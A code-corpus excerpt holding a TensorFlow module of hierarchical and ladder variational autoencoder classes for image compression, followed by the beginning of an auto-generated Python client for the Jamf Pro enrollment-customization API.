self._latent_prior = tfd.Normal(loc=tf.zeros_like(latents), scale=tf.ones_like(latents))
elif self._prior_dist == "laplace":
self._latent_prior = tfd.Laplace(loc=tf.zeros_like(latents), scale=tf.ones_like(latents))
# Needed to calculate KL term
self._q = q
# Get Bernoulli likelihood means
p_logits = self.decode(latents)
if self._likelihood == "gaussian":
p = tfd.Normal(loc=p_logits, scale=tf.ones_like(p_logits))
else:
p = tfd.Laplace(loc=p_logits, scale=tf.ones_like(p_logits))
self._log_prob = p.log_prob(inputs)
return p_logits
# ==============================================================================
class ClicHierarchicalVAE(AbstractModule):
_allowed_latent_dists = {
"gaussian": tfd.Normal,
"laplace": tfd.Laplace
}
_allowed_likelihoods = {
"gaussian": tfd.Normal,
"laplace": tfd.Laplace
}
_allowed_paddings = ["SAME", "VALID", "SAME_MIRRORED"]
_latent_priors = []
_latent_posteriors = []
def __init__(self,
num_levels,
latent_dist="gaussian",
likelihood="gaussian",
standardized=False,
padding_first_level="SAME",
padding_second_level="SAME",
name="hierarchical_vae"):
super(ClicHierarchicalVAE, self).__init__(name=name)
self._num_levels = num_levels
if latent_dist not in self._allowed_latent_dists:
raise tf.errors.InvalidArgumentError("latent_dist must be one of {}"
.format(self._allowed_latent_dists))
self._latent_dist = self._allowed_latent_dists[latent_dist]
if likelihood not in self._allowed_likelihoods:
raise tf.errors.InvalidArgumentError("likelihood must be one of {}"
.format(self._allowed_likelihoods))
self._likelihood_dist = self._allowed_likelihoods[likelihood]
if padding_first_level not in self._allowed_paddings:
raise tf.errors.InvalidArgumentError("padding_first_level must be one of {}"
.format(self._allowed_paddings))
self._padding_first_level = padding_first_level
if padding_second_level not in self._allowed_paddings:
raise tf.errors.InvalidArgumentError("padding_second_level must be one of {}"
.format(self._allowed_paddings))
self._padding_second_level = padding_second_level
self._standardized = standardized
@reuse_variables
def encode(self, inputs):
raise NotImplementedError
@reuse_variables
def decode(self, latents):
raise NotImplementedError
@property
def kl_divergence(self):
self._ensure_is_connected()
if (len(self._latent_posteriors) != self._num_levels or
len(self._latent_priors) != self._num_levels):
raise Exception("Need a full pass through the VAE to calculate KL!")
klds = [tfd.kl_divergence(posterior, prior)
for posterior, prior in zip(self._latent_posteriors, self._latent_priors)]
return klds
@property
def log_prob(self):
self._ensure_is_connected()
if (len(self._latent_posteriors) != self._num_levels or
len(self._latent_priors) != self._num_levels):
raise Exception("Need a full pass through the VAE to calculate log probability!")
return tf.reduce_sum(self._log_prob)
def _build(self, inputs):
latents = self.encode(inputs,
level=self._num_levels)
decoded_loc, decoded_scale = self.decode(latents,
decode_level=self._num_levels)
likelihood_variance = decoded_scale if not self._standardized else tf.ones_like(decoded_scale)
self._likelihood = self._likelihood_dist(loc=decoded_loc,
scale=likelihood_variance)
self._log_prob = self._likelihood.log_prob(inputs)
return decoded_loc
# ==============================================================================
# ==============================================================================
#
# Experimental architectures
#
# ==============================================================================
# ==============================================================================
class ClicCNN(ClicVAE):
def __init__(self,
top_conv_channels=128,
bottom_conv_channels=192,
prior="gaussian",
likelihood="gaussian",
padding="SAME",
name="clic_cnn_vae"):
# Initialise the superclass
super(ClicCNN, self).__init__(prior=prior,
likelihood=likelihood,
padding=padding,
name=name)
self._top_conv_channels = top_conv_channels
self._bottom_conv_channels = bottom_conv_channels
def required_input_size(self, shape, for_padding="VALID"):
shape = self.conv_mu.required_input_size(shape, for_padding=for_padding)
shape = self.conv_ds3.required_input_size(shape, for_padding=for_padding)
shape = self.conv_ds2.required_input_size(shape, for_padding=for_padding)
shape = self.conv_ds1.required_input_size(shape, for_padding=for_padding)
return shape
@reuse_variables
def encode(self, inputs):
"""
The encoder will predict the variational
posterior q(z | x) = N(z | mu(x), sigma(x)).
This will be done by using a two-headed network
Note: reuse_variables is required so that when we call
encode on its own, it uses the trained weights
"""
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First convolution layer
self.conv_ds1 = ConvDS(output_channels=self._top_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=True,
name="encoder_conv_ds1")
# Second convolution layer
self.conv_ds2 = ConvDS(output_channels=self._top_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=True,
name="encoder_conv_ds2")
# Third convolution layer
self.conv_ds3 = ConvDS(output_channels=self._top_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=True,
name="encoder_conv_ds3")
# Latent distribution moment predictiors
# Mean
self.conv_mu = ConvDS(output_channels=self._bottom_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=False,
name="encoder_conv_mu")
# Covariance
conv_sigma = ConvDS(output_channels=self._bottom_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=False,
name="encoder_conv_sigma")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = self.conv_ds3(self.conv_ds2(self.conv_ds1(inputs)))
mu = self.conv_mu(activations)
sigma = tf.nn.softplus(conv_sigma(activations))
return mu, sigma
@reuse_variables
def decode(self, latents):
"""
Note: reuse_variables is required so that when we call
encode on its own, it uses the trained weights
"""
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
deconv = self.conv_mu.transpose()
deconv_us1 = self.conv_ds3.transpose()
deconv_us2 = self.conv_ds2.transpose()
deconv_us3 = self.conv_ds1.transpose()
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = deconv_us3(deconv_us2(deconv_us1(deconv(latents))))
logits = tf.squeeze(activations)
return logits
# ==============================================================================
class ClicLadderCNN(ClicHierarchicalVAE):
def __init__(self,
latent_dist="gaussian",
likelihood="gaussian",
first_level_channels=192,
second_level_channels=128,
first_level_layers=4,
padding_first_level="SAME",
padding_second_level="SAME",
name="clic_ladder_cnn"):
super(ClicLadderCNN, self).__init__(latent_dist=latent_dist,
likelihood=likelihood,
standardized=True,
num_levels=2,
padding_first_level=padding_first_level,
padding_second_level=padding_second_level,
name=name)
self._first_level_channels = first_level_channels
self._second_level_channels = second_level_channels
self._first_level_layers = first_level_layers
@reuse_variables
def encode(self, inputs, level=1, eps=1e-5):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First level
self._first_level = [
ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=True,
name="encoder_level_1_conv_ds{}".format(idx))
for idx in range(1, self._first_level_layers)
]
self._first_level_loc_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_loc")
first_level_scale_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_scale")
# Second level
self._second_level = [
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(3, 3),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=1,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds1"),
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds2")
]
self._second_level_loc_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_loc")
second_level_scale_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_scale")
# The top-down level from the second to the first level
self._topdown_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._second_level[:0:-1]:
self._topdown_level.append(level.transpose())
topdown_loc_head = self._second_level[0].transpose(name="topdown_loc_head")
topdown_scale_head = self._second_level[0].transpose(name="topdown_scale_head")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = inputs
for layer in self._first_level:
activations = layer(activations)
# First stochastic level statistics
first_level_loc = self._first_level_loc_head(activations)
first_level_scale = tf.nn.softplus(first_level_scale_head(activations))
# This is a probabilistic ladder network with this connection
activations = first_level_loc
for layer in self._second_level:
activations = layer(activations)
# Second stochastic level statistics
second_level_loc = self._second_level_loc_head(activations)
second_level_scale = tf.nn.softplus(second_level_scale_head(activations))
# Top distribution
second_level_posterior = self._latent_dist(loc=second_level_loc,
scale=second_level_scale)
activations = second_level_posterior.sample()
latents = (activations,)
for layer in self._topdown_level:
activations = layer(activations)
# Topdown statistics
topdown_loc = topdown_loc_head(activations)
topdown_scale = tf.nn.softplus(topdown_scale_head(activations))
# Combined first level statistics
topdown_scale_sq_inv= 1. / (tf.pow(topdown_scale, 2) + eps)
first_level_scale_sq_inv= 1. / (tf.pow(first_level_scale, 2) + eps)
combined_var = 1. / (topdown_scale_sq_inv + first_level_scale_sq_inv)
combined_scale = tf.sqrt(combined_var)
combined_loc = (topdown_loc * first_level_scale_sq_inv + first_level_loc * topdown_scale_sq_inv) * combined_var
# First level distribution
first_level_posterior = self._latent_dist(loc=combined_loc,
scale=combined_scale)
activations = first_level_posterior.sample()
latents = latents + (activations,)
self._latent_posteriors = [first_level_posterior, second_level_posterior]
return latents
@reuse_variables
def decode(self, latents, decode_level=1):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# Go from top to bottom
# Second level
decoder_second_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._second_level[:0:-1]:
decoder_second_level.append(level.transpose())
first_loc_head = self._second_level[0].transpose(name="decoder_loc_head")
first_scale_head = self._second_level[0].transpose(name="decoder_scale_head")
# First level
decoder_first_level = [
self._first_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._first_level[::-1]:
decoder_first_level.append(level.transpose())
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
if len(latents) != decode_level:
raise InvalidArgumentError("Length of latents ({}) has to equal to level number {}".format(len(latents), decode_level))
if decode_level == 2:
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents[0]
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
activations = latents[1]
elif decode_level == 1:
activations = latents[0]
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
# ==============================================================================
class ClicHyperVAECNN(ClicHierarchicalVAE):
def __init__(self,
latent_dist="gaussian",
likelihood="gaussian",
first_level_channels=192,
second_level_channels=128,
first_level_layers=4,
padding_first_level="SAME",
padding_second_level="SAME",
name="clic_hyper_vae"):
super(ClicHyperVAECNN, self).__init__(latent_dist=latent_dist,
likelihood=likelihood,
standardized=True,
num_levels=2,
padding_first_level=padding_first_level,
padding_second_level=padding_second_level,
name=name)
self._first_level_channels = first_level_channels
self._second_level_channels = second_level_channels
self._first_level_layers = first_level_layers
@reuse_variables
def encode(self, inputs, level=1, eps=1e-5):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First level
self._first_level = [
ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=True,
name="encoder_level_1_conv_ds{}".format(idx))
for idx in range(1, self._first_level_layers)
]
self._first_level_loc_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_loc")
first_level_scale_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_scale")
# Second level
self._second_level = [
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(3, 3),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=1,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds1"),
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds2")
]
self._second_level_loc_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_loc")
second_level_scale_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_scale")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = inputs
for layer in self._first_level:
activations = layer(activations)
# First stochastic level statistics
first_level_loc = self._first_level_loc_head(activations)
first_level_scale = tf.nn.softplus(first_level_scale_head(activations))
first_level_posterior = self._latent_dist(loc=first_level_loc, scale=first_level_scale)
# This is a probabilistic ladder network with this connection
activations = first_level_posterior.sample()
latents = (activations,)
for layer in self._second_level:
activations = layer(activations)
# Second stochastic level statistics
second_level_loc = self._second_level_loc_head(activations)
second_level_scale = tf.nn.softplus(second_level_scale_head(activations))
# Top distribution
second_level_posterior = self._latent_dist(loc=second_level_loc,
scale=second_level_scale)
activations = second_level_posterior.sample()
latents = (activations,) + latents
self._latent_posteriors = [first_level_posterior, second_level_posterior]
return latents
@reuse_variables
def decode(self, latents, decode_level=1):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# Go from top to bottom
# Second level
decoder_second_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._second_level[:0:-1]:
decoder_second_level.append(level.transpose())
first_loc_head = self._second_level[0].transpose(name="decoder_loc_head")
first_scale_head = self._second_level[0].transpose(name="decoder_scale_head")
# First level
decoder_first_level = [
self._first_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._first_level[::-1]:
decoder_first_level.append(level.transpose())
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
if len(latents) != decode_level:
raise InvalidArgumentError("Length of latents ({}) has to equal to level number {}".format(len(latents), decode_level))
if decode_level == 2:
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents[0]
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
activations = latents[1]
elif decode_level == 1:
activations = latents[0]
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
# ==============================================================================
class ClicLadderCNN2(ClicHierarchicalVAE):
def __init__(self,
latent_dist="gaussian",
likelihood="gaussian",
first_level_channels=192,
second_level_channels=128,
first_level_layers=4,
padding_first_level="SAME",
padding_second_level="SAME",
name="clic_ladder_cnn2"):
super(ClicLadderCNN2, self).__init__(latent_dist=latent_dist,
likelihood=likelihood,
standardized=True,
num_levels=2,
padding_first_level=padding_first_level,
padding_second_level=padding_second_level,
name=name)
self._first_level_channels = first_level_channels
self._second_level_channels = second_level_channels
self._first_level_layers = first_level_layers
@reuse_variables
def encode(self, inputs, level=1, eps=1e-6):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First level
self._first_level = [
ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=True,
name="encoder_level_1_conv_ds{}".format(idx))
for idx in range(1, self._first_level_layers)
]
self._first_level_loc_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_loc")
first_level_scale_head = ConvDS(output_channels=self._first_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_first_level,
downsampling_rate=2,
use_gdn=False,
name="encoder_level_1_conv_scale")
# Second level
self._second_level = [
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(3, 3),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=1,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds1"),
ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="leaky_relu",
name="encoder_level_2_conv_ds2")
]
self._second_level_loc_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_loc")
second_level_scale_head = ConvDS(output_channels=self._second_level_channels,
kernel_shape=(5, 5),
num_convolutions=1,
padding=self._padding_second_level,
downsampling_rate=2,
use_gdn=False,
activation="none",
name="encoder_level_2_conv_scale")
# The top-down level from the second to the first level
self._topdown_level = [
self._second_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._second_level[:0:-1]:
self._topdown_level.append(level.transpose())
self._topdown_loc_head = self._second_level[0].transpose(name="topdown_loc_head")
self._topdown_scale_head = self._second_level[0].transpose(name="topdown_scale_head")
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
activations = inputs
for layer in self._first_level:
activations = layer(activations)
# First stochastic level statistics
first_level_loc = self._first_level_loc_head(activations)
first_level_precision = tf.nn.softplus(first_level_scale_head(activations))
# This is a probabilistic ladder network with this connection
activations = first_level_loc
for layer in self._second_level:
activations = layer(activations)
# Second stochastic level statistics
second_level_loc = self._second_level_loc_head(activations)
# The sigmoid activation enforces that the posterior variance is always less than
# the prior variance (which is 1)
second_level_scale = tf.nn.sigmoid(second_level_scale_head(activations))
# Top distribution
second_level_posterior = self._latent_dist(loc=second_level_loc,
scale=second_level_scale)
activations = second_level_posterior.sample()
latents = (activations,)
for layer in self._topdown_level:
activations = layer(activations)
# Topdown statistics
topdown_loc = self._topdown_loc_head(activations)
topdown_scale = tf.nn.softplus(self._topdown_scale_head(activations))
# Combined first level statistics
topdown_precision = 1. / (tf.pow(topdown_scale, 2) + eps)
combined_var = 1. / (topdown_precision + first_level_precision)
combined_scale = tf.sqrt(combined_var)
combined_loc = (topdown_loc * first_level_precision + \
first_level_loc * topdown_precision) * combined_var
# First level distribution
first_level_posterior = self._latent_dist(loc=combined_loc,
scale=combined_scale)
activations = first_level_posterior.sample()
latents = latents + (activations,)
self._latent_posteriors = [first_level_posterior, second_level_posterior]
return latents
@reuse_variables
def decode(self, latents, decode_level=1):
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# Go from top to bottom
# Second level
decoder_second_level = self._topdown_level
first_loc_head = self._topdown_loc_head
first_scale_head = self._topdown_scale_head
# First level
decoder_first_level = [
self._first_level_loc_head.transpose(),
]
# Iterate through in reverse
for level in self._first_level[::-1]:
decoder_first_level.append(level.transpose())
# ----------------------------------------------------------------------
# Apply layers
# ----------------------------------------------------------------------
# if len(latents) != decode_level:
# raise InvalidArgumentError("Length of latents ({}) has to equal to level number {}".format(len(latents), decode_level))
if decode_level == 2:
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents[0]
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
activations = latents[1]
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
elif decode_level == "second":
second_layer_prior = self._latent_dist(loc=tf.zeros_like(latents[0]),
scale=tf.ones_like(latents[0]))
activations = latents
for layer in decoder_second_level:
activations = layer(activations)
first_loc = first_loc_head(activations)
first_scale = tf.nn.softplus(first_scale_head(activations))
# First layer prior
first_layer_prior = self._latent_dist(loc=first_loc,
scale=first_scale)
self._latent_priors = [first_layer_prior, second_layer_prior]
return first_loc, first_scale
elif decode_level == "first":
activations = latents
for layer in decoder_first_level:
activations = layer(activations)
return activations, tf.ones_like(activations)
return None
# ==============================================================================
| 37.96129 | 133 | 0.502137 | 3,700 | 41,188 | 5.219459 | 0.068919 | 0.065244 | 0.033399 | 0.032312 | 0.828966 | 0.809238 | 0.797173 | 0.777703 | 0.767502 | 0.739333 | 0 | 0.009359 | 0.354059 | 41,188 | 1,084 | 134 | 37.99631 | 0.716519 | 0.143221 | 0 | 0.753125 | 0 | 0 | 0.046502 | 0.014834 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040625 | false | 0.003125 | 0.007813 | 0 | 0.098438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
96c54ce77c8b7d61919415b11320101aca042f39 | 125,344 | py | Python | jamf/api/enrollment_customization_preview_api.py | jensenbox/python-jamf | 85213085b1064a00375a7aa7df5e33c19f5178eb | [
"RSA-MD"
] | 1 | 2021-04-20T15:28:57.000Z | 2021-04-20T15:28:57.000Z | jamf/api/enrollment_customization_preview_api.py | jensenbox/python-jamf | 85213085b1064a00375a7aa7df5e33c19f5178eb | [
"RSA-MD"
] | null | null | null | jamf/api/enrollment_customization_preview_api.py | jensenbox/python-jamf | 85213085b1064a00375a7aa7df5e33c19f5178eb | [
"RSA-MD"
] | null | null | null | # coding: utf-8
"""
Jamf Pro API
## Overview This is a sample Jamf Pro server which allows for usage without any authentication. The Jamf Pro environment which supports the Try it Out functionality does not run the current beta version of Jamf Pro, thus any newly added endpoints will result in an error and should be used soley for documentation purposes. # noqa: E501
The version of the OpenAPI document: 10.25.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from jamf.api_client import ApiClient
from jamf.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class EnrollmentCustomizationPreviewApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v1_enrollment_customization_id_all_get(self, id, **kwargs): # noqa: E501
"""Get all Panels for single Enrollment Customization # noqa: E501
Get all panels for single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_get(id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: EnrollmentCustomizationPanelList
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_all_get_with_http_info(id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_all_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Get all Panels for single Enrollment Customization # noqa: E501
Get all panels for single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(EnrollmentCustomizationPanelList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_all_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_all_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "EnrollmentCustomizationPanelList",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/all', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_all_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single Panel from an Enrollment Customization # noqa: E501
Delete a single panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_all_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_all_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single Panel from an Enrollment Customization # noqa: E501
Delete a single panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_all_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_all_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_all_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
